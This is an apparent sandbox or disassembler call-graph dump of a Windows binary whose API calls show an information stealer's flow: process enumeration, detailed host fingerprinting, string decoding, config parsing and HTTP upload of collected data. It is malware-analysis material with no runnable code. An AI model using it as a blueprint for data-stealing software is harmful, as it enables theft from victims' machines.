API calls 21798->21799 21800 1845f9 21799->21800 21801 1847e8 3 API calls 21800->21801 21802 184612 21801->21802 21803 1847e8 3 API calls 21802->21803 21804 184629 21803->21804 21805 1847e8 3 API calls 21804->21805 21806 184642 21805->21806 21807 1847e8 3 API calls 21806->21807 21808 184656 21807->21808 21809 1847e8 3 API calls 21808->21809 21810 18466d 21809->21810 21811 1847e8 3 API calls 21810->21811 21812 184684 21811->21812 21813 1847e8 3 API calls 21812->21813 21814 18469b 21813->21814 21815 1847e8 3 API calls 21814->21815 21816 1846b2 21815->21816 21817 1847e8 3 API calls 21816->21817 21818 1846cc 21817->21818 21819 1847e8 3 API calls 21818->21819 21820 1846e3 21819->21820 21821 1847e8 3 API calls 21820->21821 21822 1846f9 21821->21822 21823 1847e8 3 API calls 21822->21823 21824 184710 21823->21824 21825 1847e8 3 API calls 21824->21825 21826 184727 21825->21826 21827 1847e8 3 API calls 21826->21827 21828 18473d 21827->21828 21829 1847e8 3 API calls 21828->21829 21830 184754 21829->21830 21831 1847e8 3 API calls 21830->21831 21832 184768 21831->21832 21833 1847e8 3 API calls 21832->21833 21834 184781 21833->21834 21835 1847e8 3 API calls 21834->21835 21836 184797 21835->21836 21837 1847e8 3 API calls 21836->21837 21838 1847ae 21837->21838 21839 1847e8 3 API calls 21838->21839 21840 1847c5 21839->21840 21841 1847e8 3 API calls 21840->21841 21842 1847dc 21841->21842 21842->20850 23008 1af159 21843->23008 21845 192563 CreateToolhelp32Snapshot Process32First 21846 1925c4 CloseHandle 21845->21846 21847 192597 Process32Next 21845->21847 23009 1af1b5 21846->23009 21847->21846 21848 1925a9 StrCmpCA 21847->21848 21848->21847 21850 1925bb 21848->21850 21850->21847 21853 1904bc lstrcpyA 21852->21853 21854 191c3c 21853->21854 21855 1904bc lstrcpyA 21854->21855 21856 191c4a GetSystemTime 21855->21856 21857 191c66 21856->21857 21858 19d05a UnDecorator::getZName 5 API calls 21857->21858 21859 191c9d 21858->21859 21859->20856 21861 1905b6 21860->21861 21862 1905da 21861->21862 21863 1905c8 lstrcpyA lstrcatA 21861->21863 21862->20872 21863->21862 21865 1904ee lstrcpyA 21864->21865 21866 181d07 21865->21866 21867 1904ee lstrcpyA 21866->21867 21868 181d12 21867->21868 21869 1904ee lstrcpyA 21868->21869 21870 181d1d 21869->21870 21871 1904ee lstrcpyA 21870->21871 21872 181d34 21871->21872 21873 1969f8 21872->21873 21874 19051e 2 API calls 21873->21874 21875 196a2e 21874->21875 21876 19051e 2 API calls 21875->21876 21877 196a3b 21876->21877 21878 19051e 2 API calls 21877->21878 21879 196a48 21878->21879 21880 1904bc lstrcpyA 21879->21880 21881 196a55 21880->21881 21882 1904bc lstrcpyA 21881->21882 21883 196a62 21882->21883 21884 1904bc lstrcpyA 21883->21884 21885 196a6f 21884->21885 21886 1904bc lstrcpyA 21885->21886 21887 196a7c 21886->21887 21888 1904bc lstrcpyA 21887->21888 21889 196a89 21888->21889 21890 1904bc lstrcpyA 21889->21890 21946 196a96 21890->21946 21893 181cfd lstrcpyA 21893->21946 21894 196ada StrCmpCA 21895 196b33 StrCmpCA 21894->21895 21894->21946 21897 196d16 21895->21897 21895->21946 21898 190562 lstrcpyA 21897->21898 21900 196d21 21898->21900 21902 1904bc lstrcpyA 21900->21902 21903 196d2e 21902->21903 21904 190562 lstrcpyA 21903->21904 21942 196c6e 21904->21942 21905 196880 28 API calls 21905->21946 21906 196908 33 API calls 21906->21946 21907 1904bc lstrcpyA 21908 196d4d 21907->21908 21910 190562 lstrcpyA 21908->21910 21909 196b93 StrCmpCA 21911 196bec StrCmpCA 21909->21911 21909->21946 21912 196d57 21910->21912 21913 196c02 StrCmpCA 21911->21913 21914 196ce5 21911->21914 23018 196de4 21912->23018 21917 196c18 StrCmpCA 21913->21917 21918 196cb4 21913->21918 21916 190562 lstrcpyA 21914->21916 21920 196cf0 21916->21920 21921 196c2a StrCmpCA 21917->21921 21922 196c80 21917->21922 21924 190562 lstrcpyA 21918->21924 21927 1904bc lstrcpyA 21920->21927 21928 196c4c 21921->21928 21929 196c3c Sleep 21921->21929 21926 190562 lstrcpyA 21922->21926 21923 1904ee lstrcpyA 21923->21946 21925 196cbf 21924->21925 21930 1904bc lstrcpyA 21925->21930 21931 196c8b 21926->21931 21932 196cfd 21927->21932 21933 190562 lstrcpyA 21928->21933 21929->21946 21934 196ccc 21930->21934 21935 1904bc lstrcpyA 21931->21935 21936 190562 lstrcpyA 21932->21936 21937 196c57 21933->21937 21938 190562 lstrcpyA 21934->21938 21939 196c98 21935->21939 21936->21942 21940 1904bc lstrcpyA 21937->21940 21938->21942 21943 190562 lstrcpyA 21939->21943 21941 196c64 21940->21941 21944 190562 lstrcpyA 21941->21944 21942->21907 21943->21942 21944->21942 21945 190562 lstrcpyA 21945->21946 21946->21893 21946->21894 21946->21895 21946->21905 21946->21906 21946->21909 21946->21911 21946->21923 21946->21945 23012 1829f8 21946->23012 23015 182a09 21946->23015 23025 182a1a lstrcpyA 21946->23025 23026 182a2b lstrcpyA 21946->23026 23027 182a3c lstrcpyA 21946->23027 23028 182a4d lstrcpyA 21946->23028 21947 196d6a 21947->20884 21949 190562 lstrcpyA 21948->21949 21950 198299 21949->21950 21951 190562 lstrcpyA 21950->21951 21952 1982a4 21951->21952 21953 190562 lstrcpyA 21952->21953 21954 1982af 21953->21954 21954->20888 21956 1904fe 21955->21956 21957 190513 21956->21957 21958 19050b lstrcpyA 21956->21958 21957->20899 21958->21957 21960 1909bb GetVolumeInformationA 21959->21960 21961 1909b4 21959->21961 21962 190a22 21960->21962 21961->21960 21962->21962 21963 190a37 GetProcessHeap HeapAlloc 21962->21963 21964 190a61 wsprintfA lstrcatA 21963->21964 21965 190a52 21963->21965 23029 191659 GetCurrentHwProfileA 21964->23029 21966 1904bc lstrcpyA 21965->21966 21968 190a5a 21966->21968 21971 19d05a UnDecorator::getZName 5 API calls 21968->21971 21969 190a9c lstrlenA 23045 1923aa lstrcpyA malloc strncpy 21969->23045 21973 190b03 21971->21973 21972 190abf lstrcatA 21974 190ad6 21972->21974 21973->20926 21975 1904bc lstrcpyA 21974->21975 21976 190aed 21975->21976 21976->21968 21978 1904ee lstrcpyA 21977->21978 21979 184b59 21978->21979 23049 184ab6 21979->23049 21981 184b65 21982 1904bc lstrcpyA 21981->21982 21983 184b81 21982->21983 21984 1904bc lstrcpyA 21983->21984 21985 184b91 21984->21985 21986 1904bc lstrcpyA 21985->21986 21987 184ba1 21986->21987 21988 1904bc lstrcpyA 21987->21988 21989 184bb1 21988->21989 21990 1904bc lstrcpyA 21989->21990 21991 184bc1 InternetOpenA StrCmpCA 21990->21991 21992 184bf5 21991->21992 21993 185194 InternetCloseHandle 21992->21993 21994 184c07 21992->21994 22005 1851e1 21993->22005 21995 191c1f 7 API calls 21994->21995 21996 184c15 21995->21996 21997 19059c 2 API calls 21996->21997 21998 184c28 21997->21998 21999 190562 lstrcpyA 21998->21999 22000 184c33 21999->22000 22001 1905de 3 API calls 22000->22001 22002 184c5f 22001->22002 22003 190562 lstrcpyA 22002->22003 22004 184c6a 22003->22004 22006 1905de 3 API calls 22004->22006 22007 19d05a UnDecorator::getZName 5 API calls 22005->22007 22008 184c8b 22006->22008 22009 185235 22007->22009 22010 190562 lstrcpyA 22008->22010 22111 193a02 StrCmpCA 22009->22111 22011 184c96 22010->22011 22012 19059c 2 API calls 22011->22012 22013 184cb8 22012->22013 22014 190562 lstrcpyA 22013->22014 22015 184cc3 22014->22015 22016 1905de 3 API calls 22015->22016 22017 184ce4 22016->22017 22018 190562 lstrcpyA 22017->22018 22019 184cef 22018->22019 22020 1905de 3 API calls 22019->22020 22021 184d10 22020->22021 22022 190562 lstrcpyA 22021->22022 22023 184d1b 22022->22023 22024 1905de 3 API calls 22023->22024 22025 184d3d 22024->22025 22026 19059c 2 API calls 22025->22026 22027 184d48 22026->22027 22028 190562 lstrcpyA 22027->22028 22029 184d53 22028->22029 22030 184d69 InternetConnectA 22029->22030 22030->21993 22031 184d97 HttpOpenRequestA 22030->22031 22032 185188 InternetCloseHandle 22031->22032 22033 184dd7 22031->22033 22032->21993 22034 184dfb 22033->22034 22035 184ddf InternetSetOptionA 22033->22035 22036 1905de 3 API calls 22034->22036 22035->22034 22037 184e11 22036->22037 22038 190562 lstrcpyA 22037->22038 22039 184e1c 22038->22039 22040 19059c 2 API calls 22039->22040 22041 184e3e 22040->22041 22042 190562 lstrcpyA 22041->22042 22043 184e49 22042->22043 22044 1905de 3 API calls 22043->22044 22045 184e6a 22044->22045 22046 190562 lstrcpyA 22045->22046 22047 184e75 22046->22047 22048 1905de 3 API calls 22047->22048 22049 184e97 22048->22049 22050 190562 lstrcpyA 22049->22050 22051 184ea2 22050->22051 22052 1905de 3 API calls 22051->22052 22053 184ec3 22052->22053 22054 190562 lstrcpyA 22053->22054 22055 184ece 22054->22055 22056 1905de 3 API calls 22055->22056 22057 184eef 22056->22057 22058 190562 lstrcpyA 22057->22058 22059 184efa 22058->22059 22060 19059c 2 API calls 22059->22060 22061 184f19 22060->22061 22062 190562 lstrcpyA 22061->22062 22063 184f24 22062->22063 22064 1905de 3 API calls 22063->22064 22065 184f45 22064->22065 22066 190562 lstrcpyA 22065->22066 22067 184f50 22066->22067 22068 1905de 3 API calls 22067->22068 22069 184f71 22068->22069 22070 190562 lstrcpyA 22069->22070 22071 184f7c 22070->22071 22072 19059c 2 API calls 22071->22072 22073 184f9e 22072->22073 22074 190562 lstrcpyA 22073->22074 22075 184fa9 22074->22075 22076 1905de 3 API calls 22075->22076 22077 184fca 22076->22077 22078 190562 lstrcpyA 22077->22078 22079 184fd5 22078->22079 22080 1905de 3 API calls 22079->22080 22081 184ff7 22080->22081 22082 190562 lstrcpyA 22081->22082 22083 185002 22082->22083 22084 1905de 3 API calls 22083->22084 22085 185023 22084->22085 22086 190562 lstrcpyA 22085->22086 22087 18502e 22086->22087 22088 1905de 3 API calls 22087->22088 22089 18504f 22088->22089 22090 190562 lstrcpyA 22089->22090 22091 18505a 22090->22091 22092 19059c 2 API calls 22091->22092 22093 185079 22092->22093 22094 190562 lstrcpyA 22093->22094 22095 185084 22094->22095 22096 1904bc lstrcpyA 22095->22096 22097 18509f 22096->22097 22098 19059c 2 API calls 22097->22098 22099 1850b6 22098->22099 22100 19059c 2 API calls 22099->22100 22101 1850c7 22100->22101 22102 190562 lstrcpyA 22101->22102 22103 1850d2 22102->22103 22104 1850e8 lstrlenA lstrlenA HttpSendRequestA 22103->22104 22105 18515c InternetReadFile 22104->22105 22106 185176 InternetCloseHandle 22105->22106 22109 18511c 22105->22109 22107 182920 22106->22107 22107->22032 22108 1905de 3 API calls 22108->22109 22109->22105 22109->22106 22109->22108 22110 190562 lstrcpyA 22109->22110 22110->22109 22112 193a28 strtok_s 22111->22112 22113 193a21 ExitProcess 22111->22113 22114 193b88 22112->22114 22127 193a44 22112->22127 22114->20935 22115 193b6a strtok_s 22115->22114 22115->22127 22116 193a99 StrCmpCA 22116->22115 22116->22127 22117 193b09 StrCmpCA 22117->22115 22117->22127 22118 193a7d StrCmpCA 22118->22115 22118->22127 22119 193adf StrCmpCA 22119->22115 22119->22127 22120 193b1e StrCmpCA 22120->22115 22121 193a61 StrCmpCA 22121->22115 22121->22127 22122 193ab5 StrCmpCA 22122->22115 22122->22127 22123 193af4 StrCmpCA 22123->22115 22123->22127 22124 193b34 StrCmpCA 22124->22115 22125 193b56 StrCmpCA 22125->22115 22126 19051e 2 API calls 22126->22127 22127->22115 22127->22116 22127->22117 22127->22118 22127->22119 22127->22120 22127->22121 22127->22122 22127->22123 22127->22124 22127->22125 22127->22126 22129 1904ee lstrcpyA 22128->22129 22130 185f64 22129->22130 22131 184ab6 5 API calls 22130->22131 22132 185f70 22131->22132 22133 1904bc lstrcpyA 22132->22133 22134 185f8c 22133->22134 22135 1904bc lstrcpyA 22134->22135 22136 185f9c 22135->22136 22137 1904bc lstrcpyA 22136->22137 22138 185fac 22137->22138 22139 1904bc lstrcpyA 22138->22139 22140 185fbc 22139->22140 22141 1904bc lstrcpyA 22140->22141 22142 185fcc InternetOpenA StrCmpCA 22141->22142 22143 186000 22142->22143 22144 1866ff InternetCloseHandle 22143->22144 22145 186012 22143->22145 23053 188048 CryptStringToBinaryA 22144->23053 22147 191c1f 7 API calls 22145->22147 22149 186020 22147->22149 22150 19059c 2 API calls 22149->22150 22152 186033 22150->22152 22151 19051e 2 API calls 22154 186739 22151->22154 22153 190562 lstrcpyA 22152->22153 22158 18603e 22153->22158 22155 1905de 3 API calls 22154->22155 22156 186750 22155->22156 22157 190562 lstrcpyA 22156->22157 22163 18675b 22157->22163 22159 1905de 3 API calls 22158->22159 22160 18606a 22159->22160 22161 190562 lstrcpyA 22160->22161 22162 186075 22161->22162 22166 1905de 3 API calls 22162->22166 22164 19d05a UnDecorator::getZName 5 API calls 22163->22164 22165 1867eb 22164->22165 22296 19347f strtok_s 22165->22296 22167 186096 22166->22167 22168 190562 lstrcpyA 22167->22168 22169 1860a1 22168->22169 22170 19059c 2 API calls 22169->22170 22171 1860c3 22170->22171 22172 190562 lstrcpyA 22171->22172 22173 1860ce 22172->22173 22174 1905de 3 API calls 22173->22174 22175 1860ef 22174->22175 22176 190562 lstrcpyA 22175->22176 22177 1860fa 22176->22177 22178 1905de 3 API calls 22177->22178 22179 18611b 22178->22179 22180 190562 lstrcpyA 22179->22180 22181 186126 22180->22181 22182 1905de 3 API calls 22181->22182 22183 186148 22182->22183 22184 19059c 2 API calls 22183->22184 22185 186153 22184->22185 22186 190562 lstrcpyA 22185->22186 22187 18615e 22186->22187 22188 186174 InternetConnectA 22187->22188 22188->22144 22189 1861a2 HttpOpenRequestA 22188->22189 22190 1861e2 22189->22190 22191 1866f3 InternetCloseHandle 22189->22191 22192 1861ea InternetSetOptionA 22190->22192 22193 186206 22190->22193 22191->22144 22192->22193 22194 1905de 3 API calls 22193->22194 22195 18621c 22194->22195 22196 190562 lstrcpyA 22195->22196 22197 186227 22196->22197 22198 19059c 2 API calls 22197->22198 22199 186249 22198->22199 22200 190562 lstrcpyA 22199->22200 22201 186254 22200->22201 22202 1905de 3 API calls 22201->22202 22203 186275 22202->22203 22204 190562 lstrcpyA 22203->22204 22205 186280 22204->22205 22206 1905de 3 API calls 22205->22206 22207 1862a2 22206->22207 22208 190562 lstrcpyA 22207->22208 22209 1862ad 22208->22209 22210 1905de 3 API calls 22209->22210 22211 1862cf 22210->22211 22212 190562 lstrcpyA 22211->22212 22213 1862da 22212->22213 22214 1905de 3 API calls 22213->22214 22215 1862fb 22214->22215 22216 190562 lstrcpyA 22215->22216 22217 186306 22216->22217 22218 19059c 2 API calls 22217->22218 22219 186325 22218->22219 22220 190562 lstrcpyA 22219->22220 22221 186330 22220->22221 22222 1905de 3 API calls 22221->22222 22223 186351 22222->22223 22224 190562 lstrcpyA 22223->22224 22225 18635c 22224->22225 22226 1905de 3 API calls 22225->22226 22227 18637d 22226->22227 22228 190562 lstrcpyA 22227->22228 22229 186388 22228->22229 22230 19059c 2 API calls 22229->22230 22231 1863aa 22230->22231 22232 190562 lstrcpyA 22231->22232 22233 1863b5 22232->22233 22234 1905de 3 API calls 22233->22234 22235 1863d6 22234->22235 22236 190562 lstrcpyA 22235->22236 22237 1863e1 22236->22237 22238 1905de 3 API calls 22237->22238 22239 186403 22238->22239 22240 190562 lstrcpyA 22239->22240 22241 18640e 22240->22241 22242 1905de 3 API calls 22241->22242 22243 18642f 22242->22243 22244 190562 lstrcpyA 22243->22244 22245 18643a 22244->22245 22246 1905de 3 API calls 22245->22246 22247 18645b 22246->22247 22248 190562 lstrcpyA 22247->22248 22249 186466 22248->22249 22250 1905de 3 API calls 22249->22250 22251 186487 22250->22251 22252 190562 lstrcpyA 22251->22252 22253 186492 22252->22253 22254 1905de 3 API calls 22253->22254 22255 1864b3 22254->22255 22256 190562 lstrcpyA 22255->22256 22257 1864be 22256->22257 22258 1905de 3 API calls 22257->22258 22259 1864df 22258->22259 22260 190562 lstrcpyA 22259->22260 22261 1864ea 22260->22261 22262 19059c 2 API calls 22261->22262 22263 186506 22262->22263 22264 190562 lstrcpyA 22263->22264 22265 186511 22264->22265 22266 1905de 3 API calls 22265->22266 22267 186532 22266->22267 22268 190562 lstrcpyA 22267->22268 22269 18653d 22268->22269 22270 1905de 3 API calls 22269->22270 22271 18655f 22270->22271 22272 190562 lstrcpyA 22271->22272 22273 18656a 22272->22273 22274 1905de 3 API calls 22273->22274 22275 18658b 22274->22275 22276 190562 lstrcpyA 22275->22276 22277 186596 22276->22277 22278 1905de 3 API calls 22277->22278 22279 1865b7 22278->22279 22280 190562 lstrcpyA 22279->22280 22281 1865c2 22280->22281 22282 19059c 2 API calls 22281->22282 22283 1865e1 22282->22283 22284 190562 lstrcpyA 22283->22284 22285 1865ec 22284->22285 22286 1865f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 22285->22286 23058 1a70a0 22286->23058 22288 18663e lstrlenA lstrlenA 23059 1a70a0 22288->23059 22290 186667 lstrlenA HttpSendRequestA 22291 1866d2 InternetReadFile 22290->22291 22292 1866ec InternetCloseHandle 22291->22292 22294 186692 22291->22294 22292->22191 22293 1905de 3 API calls 22293->22294 22294->22291 22294->22292 22294->22293 22295 190562 lstrcpyA 22294->22295 22295->22294 22297 19350c 22296->22297 22298 1934ae 22296->22298 22297->20949 22299 1934f6 strtok_s 22298->22299 22300 19051e 2 API calls 22298->22300 22301 19051e 2 API calls 22298->22301 22299->22297 22299->22298 22300->22299 22301->22298 22310 1932c6 22302->22310 22303 1933c5 22303->20963 22304 193372 StrCmpCA 22304->22310 22305 19051e 2 API calls 22305->22310 22306 1933a7 strtok_s 22306->22310 22307 193341 StrCmpCA 22307->22310 22308 19331c StrCmpCA 22308->22310 22309 1932eb StrCmpCA 22309->22310 22310->22303 22310->22304 22310->22305 22310->22306 22310->22307 22310->22308 22310->22309 22314 1933fc 22311->22314 22317 193474 22311->22317 22312 193422 StrCmpCA 22312->22314 22313 19051e 2 API calls 22315 19345a strtok_s 22313->22315 22314->22312 22314->22313 22314->22315 22316 19051e 2 API calls 22314->22316 22315->22314 22315->22317 22316->22314 22317->20975 22319 1904bc lstrcpyA 22318->22319 22320 193bdf 22319->22320 22321 1905de 3 API calls 22320->22321 22322 193bef 22321->22322 22323 190562 lstrcpyA 22322->22323 22324 193bf7 22323->22324 22325 1905de 3 API calls 22324->22325 22326 193c0f 22325->22326 22327 190562 lstrcpyA 22326->22327 22328 193c17 22327->22328 22329 1905de 3 API calls 22328->22329 22330 193c2f 22329->22330 22331 190562 lstrcpyA 22330->22331 22332 193c37 22331->22332 22333 1905de 3 API calls 22332->22333 22334 193c4f 22333->22334 22335 190562 lstrcpyA 22334->22335 22336 193c57 22335->22336 22337 1905de 3 API calls 22336->22337 22338 193c6f 22337->22338 22339 190562 lstrcpyA 22338->22339 22340 193c77 22339->22340 23060 190c95 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 22340->23060 22343 1905de 3 API calls 22344 193c90 22343->22344 22345 190562 lstrcpyA 22344->22345 22346 193c98 22345->22346 22347 1905de 3 API calls 22346->22347 22348 193cb0 22347->22348 22349 190562 lstrcpyA 22348->22349 22350 193cb8 22349->22350 22351 1905de 3 API calls 22350->22351 22352 193cd0 22351->22352 22353 190562 lstrcpyA 22352->22353 22354 193cd8 22353->22354 23063 1915a9 22354->23063 22357 1905de 3 API calls 22358 193cf1 22357->22358 22359 190562 lstrcpyA 22358->22359 22360 193cf9 22359->22360 22361 1905de 3 API calls 22360->22361 22362 193d11 22361->22362 22363 190562 lstrcpyA 22362->22363 22364 193d19 22363->22364 22365 1905de 3 API calls 22364->22365 22366 193d31 22365->22366 22367 190562 lstrcpyA 22366->22367 22368 193d39 22367->22368 22369 191659 11 API calls 22368->22369 22370 193d49 22369->22370 22371 19059c 2 API calls 22370->22371 22372 193d56 22371->22372 22373 190562 lstrcpyA 22372->22373 22374 193d5e 22373->22374 22375 1905de 3 API calls 22374->22375 22376 193d7e 22375->22376 22377 190562 lstrcpyA 22376->22377 22378 193d86 22377->22378 22379 1905de 3 API calls 22378->22379 22380 193d9e 22379->22380 22381 190562 lstrcpyA 22380->22381 22382 193da6 22381->22382 22383 190977 19 API calls 22382->22383 22384 193db6 22383->22384 22385 19059c 2 API calls 22384->22385 22386 193dc3 22385->22386 22387 190562 lstrcpyA 22386->22387 22388 193dcb 22387->22388 22389 1905de 3 API calls 22388->22389 22390 193deb 22389->22390 22391 190562 lstrcpyA 22390->22391 22392 193df3 22391->22392 22393 1905de 3 API calls 22392->22393 22394 193e0b 22393->22394 22395 190562 lstrcpyA 22394->22395 22396 193e13 22395->22396 22397 193e1b GetCurrentProcessId 22396->22397 23070 19221f OpenProcess 22397->23070 22400 19059c 2 API calls 22401 193e38 22400->22401 22402 190562 lstrcpyA 22401->22402 22403 193e40 22402->22403 22404 1905de 3 API calls 22403->22404 22405 193e60 22404->22405 22406 190562 lstrcpyA 22405->22406 22407 193e68 22406->22407 22408 1905de 3 API calls 22407->22408 22409 193e80 22408->22409 22410 190562 lstrcpyA 22409->22410 22411 193e88 22410->22411 22412 1905de 3 API calls 22411->22412 22413 193ea0 22412->22413 22414 190562 lstrcpyA 22413->22414 22415 193ea8 22414->22415 22416 1905de 3 API calls 22415->22416 22417 193ec0 22416->22417 22418 190562 lstrcpyA 22417->22418 22419 193ec8 22418->22419 23077 190b05 GetProcessHeap HeapAlloc 22419->23077 22422 1905de 3 API calls 22423 193ee1 22422->22423 22424 190562 lstrcpyA 22423->22424 22425 193ee9 22424->22425 22426 1905de 3 API calls 22425->22426 22427 193f01 22426->22427 22428 190562 lstrcpyA 22427->22428 22429 193f09 22428->22429 22430 1905de 3 API calls 22429->22430 22431 193f21 22430->22431 22432 190562 lstrcpyA 22431->22432 22433 193f29 22432->22433 23084 1917dc 22433->23084 22436 19059c 2 API calls 22437 193f46 22436->22437 22438 190562 lstrcpyA 22437->22438 22439 193f4e 22438->22439 22440 1905de 3 API calls 22439->22440 22441 193f6e 22440->22441 22442 190562 lstrcpyA 22441->22442 22443 193f76 22442->22443 22444 1905de 3 API calls 22443->22444 22445 193f8e 22444->22445 22446 190562 lstrcpyA 22445->22446 22447 193f96 22446->22447 23101 19196c 22447->23101 22449 193fa7 22450 19059c 2 API calls 22449->22450 22451 193fb5 22450->22451 22452 190562 lstrcpyA 22451->22452 22453 193fbd 22452->22453 22454 1905de 3 API calls 22453->22454 22455 193fdd 22454->22455 22456 190562 lstrcpyA 22455->22456 22457 193fe5 22456->22457 22458 1905de 3 API calls 22457->22458 22459 193ffd 22458->22459 22460 190562 lstrcpyA 22459->22460 22461 194005 22460->22461 22462 190c5a 3 API calls 22461->22462 22463 194012 22462->22463 22464 1905de 3 API calls 22463->22464 22465 19401e 22464->22465 22466 190562 lstrcpyA 22465->22466 22467 194026 22466->22467 22468 1905de 3 API calls 22467->22468 22469 19403e 22468->22469 22470 190562 lstrcpyA 22469->22470 22471 194046 22470->22471 22472 1905de 3 API calls 22471->22472 22473 19405e 22472->22473 22474 190562 lstrcpyA 22473->22474 22475 194066 22474->22475 23116 190c28 GetProcessHeap HeapAlloc GetUserNameA 22475->23116 22477 194073 22478 1905de 3 API calls 22477->22478 22479 19407f 22478->22479 22480 190562 lstrcpyA 22479->22480 22481 194087 22480->22481 22482 1905de 3 API calls 22481->22482 22483 19409f 22482->22483 22484 190562 lstrcpyA 22483->22484 22485 1940a7 22484->22485 22486 1905de 3 API calls 22485->22486 22487 1940bf 22486->22487 22488 190562 lstrcpyA 22487->22488 22489 1940c7 22488->22489 23117 191538 7 API calls 22489->23117 22492 19059c 2 API calls 22493 1940e6 22492->22493 22494 190562 lstrcpyA 22493->22494 22495 1940ee 22494->22495 22496 1905de 3 API calls 22495->22496 22497 19410e 22496->22497 22498 190562 lstrcpyA 22497->22498 22499 194116 22498->22499 22500 1905de 3 API calls 22499->22500 22501 19412e 22500->22501 22502 190562 lstrcpyA 22501->22502 22503 194136 22502->22503 23120 190db0 22503->23120 22506 19059c 2 API calls 22507 194153 22506->22507 22508 190562 lstrcpyA 22507->22508 22509 19415b 22508->22509 22510 1905de 3 API calls 22509->22510 22511 19417b 22510->22511 22512 190562 lstrcpyA 22511->22512 22513 194183 22512->22513 22514 1905de 3 API calls 22513->22514 22515 19419b 22514->22515 22516 190562 lstrcpyA 22515->22516 22517 1941a3 22516->22517 22518 190c95 9 API calls 22517->22518 22519 1941b0 22518->22519 22520 1905de 3 API calls 22519->22520 22521 1941bc 22520->22521 22522 190562 lstrcpyA 22521->22522 22523 1941c4 22522->22523 22524 1905de 3 API calls 22523->22524 22525 1941dc 22524->22525 22526 190562 lstrcpyA 22525->22526 22527 1941e4 22526->22527 22528 1905de 3 API calls 22527->22528 22529 1941fc 22528->22529 22530 190562 lstrcpyA 22529->22530 22531 194204 22530->22531 23132 190d03 GetProcessHeap HeapAlloc GetTimeZoneInformation 22531->23132 22534 1905de 3 API calls 22535 19421d 22534->22535 22536 190562 lstrcpyA 22535->22536 22537 194225 22536->22537 22538 1905de 3 API calls 22537->22538 22539 19423d 22538->22539 22540 190562 lstrcpyA 22539->22540 22541 194245 22540->22541 22542 1905de 3 API calls 22541->22542 22543 19425d 22542->22543 22544 190562 lstrcpyA 22543->22544 22545 194265 22544->22545 22546 1905de 3 API calls 22545->22546 22547 19427d 22546->22547 22548 190562 lstrcpyA 22547->22548 22549 194285 22548->22549 23137 190f26 GetProcessHeap HeapAlloc RegOpenKeyExA 22549->23137 22551 194292 22552 1905de 3 API calls 22551->22552 22553 19429e 22552->22553 22554 190562 lstrcpyA 22553->22554 22555 1942a6 22554->22555 22556 1905de 3 API calls 22555->22556 22557 1942be 22556->22557 22558 190562 lstrcpyA 22557->22558 22559 1942c6 22558->22559 22560 1905de 3 API calls 22559->22560 22561 1942de 22560->22561 22562 190562 lstrcpyA 22561->22562 22563 1942e6 22562->22563 23140 190fdc 22563->23140 22566 1905de 3 API calls 22567 1942ff 22566->22567 22568 190562 lstrcpyA 22567->22568 22569 194307 22568->22569 22570 1905de 3 API calls 22569->22570 22571 19431f 22570->22571 22572 190562 lstrcpyA 22571->22572 22573 194327 22572->22573 22574 1905de 3 API calls 22573->22574 22575 19433f 22574->22575 22576 190562 lstrcpyA 22575->22576 22577 194347 22576->22577 23157 190f8f GetSystemInfo wsprintfA 22577->23157 22580 1905de 3 API calls 22581 194360 22580->22581 22582 190562 lstrcpyA 22581->22582 22583 194368 22582->22583 22584 1905de 3 API calls 22583->22584 22585 194380 22584->22585 22586 190562 lstrcpyA 22585->22586 22587 194388 22586->22587 22588 1905de 3 API calls 22587->22588 22589 1943a0 22588->22589 22590 190562 lstrcpyA 22589->22590 22591 1943a8 22590->22591 23160 1910ee GetProcessHeap HeapAlloc 22591->23160 22594 1905de 3 API calls 22595 1943c1 22594->22595 22596 190562 lstrcpyA 22595->22596 22597 1943c9 22596->22597 22598 1905de 3 API calls 22597->22598 22599 1943e4 22598->22599 22600 190562 lstrcpyA 22599->22600 22601 1943ec 22600->22601 22602 1905de 3 API calls 22601->22602 22603 194407 22602->22603 22604 190562 lstrcpyA 22603->22604 22605 19440f 22604->22605 23167 191167 22605->23167 22608 19059c 2 API calls 22609 19442f 22608->22609 22610 190562 lstrcpyA 22609->22610 22611 194437 22610->22611 22612 1905de 3 API calls 22611->22612 22613 19445a 22612->22613 22614 190562 lstrcpyA 22613->22614 22615 194462 22614->22615 22616 1905de 3 API calls 22615->22616 22617 19447a 22616->22617 22618 190562 lstrcpyA 22617->22618 22619 194482 22618->22619 23174 19147a 22619->23174 22622 19059c 2 API calls 22623 1944a2 22622->22623 22624 190562 lstrcpyA 22623->22624 22625 1944aa 22624->22625 22626 1905de 3 API calls 22625->22626 22627 1944d0 22626->22627 22628 190562 lstrcpyA 22627->22628 22629 1944d8 22628->22629 22630 1905de 3 API calls 22629->22630 22631 1944f3 22630->22631 22632 190562 lstrcpyA 22631->22632 22633 1944fb 22632->22633 23184 1911d8 22633->23184 22636 19059c 2 API calls 22637 194520 22636->22637 22638 190562 lstrcpyA 22637->22638 22639 194528 22638->22639 22640 1911d8 21 API calls 22639->22640 22641 194549 22640->22641 22642 19059c 2 API calls 22641->22642 22643 194558 22642->22643 22644 190562 lstrcpyA 22643->22644 22645 194560 22644->22645 22646 1905de 3 API calls 22645->22646 22647 194583 22646->22647 22648 190562 lstrcpyA 22647->22648 22649 19458b 22648->22649 22650 181cfd lstrcpyA 22649->22650 22651 1945a0 lstrlenA 22650->22651 22652 1904bc lstrcpyA 22651->22652 22653 1945bd 22652->22653 23204 196ed9 22653->23204 22655 1945c6 22655->20983 22657 1904ee lstrcpyA 22656->22657 22658 18525a 22657->22658 22659 184ab6 5 API calls 22658->22659 22660 185266 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 22659->22660 22661 1852cb 22660->22661 22662 1852d9 InternetConnectA 22661->22662 22663 18544b InternetCloseHandle 22661->22663 22664 18543f InternetCloseHandle 22662->22664 22665 185305 HttpOpenRequestA 22662->22665 22666 18545f 22663->22666 22664->22663 22667 185433 InternetCloseHandle 22665->22667 22668 185346 22665->22668 22672 19d05a UnDecorator::getZName 5 API calls 22666->22672 22667->22664 22669 18534a InternetSetOptionA 22668->22669 22670 185366 HttpSendRequestA HttpQueryInfoA 22668->22670 22669->22670 22671 1853bb 22670->22671 22675 18539e 22670->22675 22671->22667 22673 1853c1 InternetReadFile 22671->22673 22674 185480 22672->22674 22673->22667 22673->22671 22674->20994 22675->22666 23448 187eee 22676->23448 22678 18ec73 22680 181cfd lstrcpyA 22678->22680 22679 18eac4 StrCmpCA 22681 18eb21 StrCmpCA 22679->22681 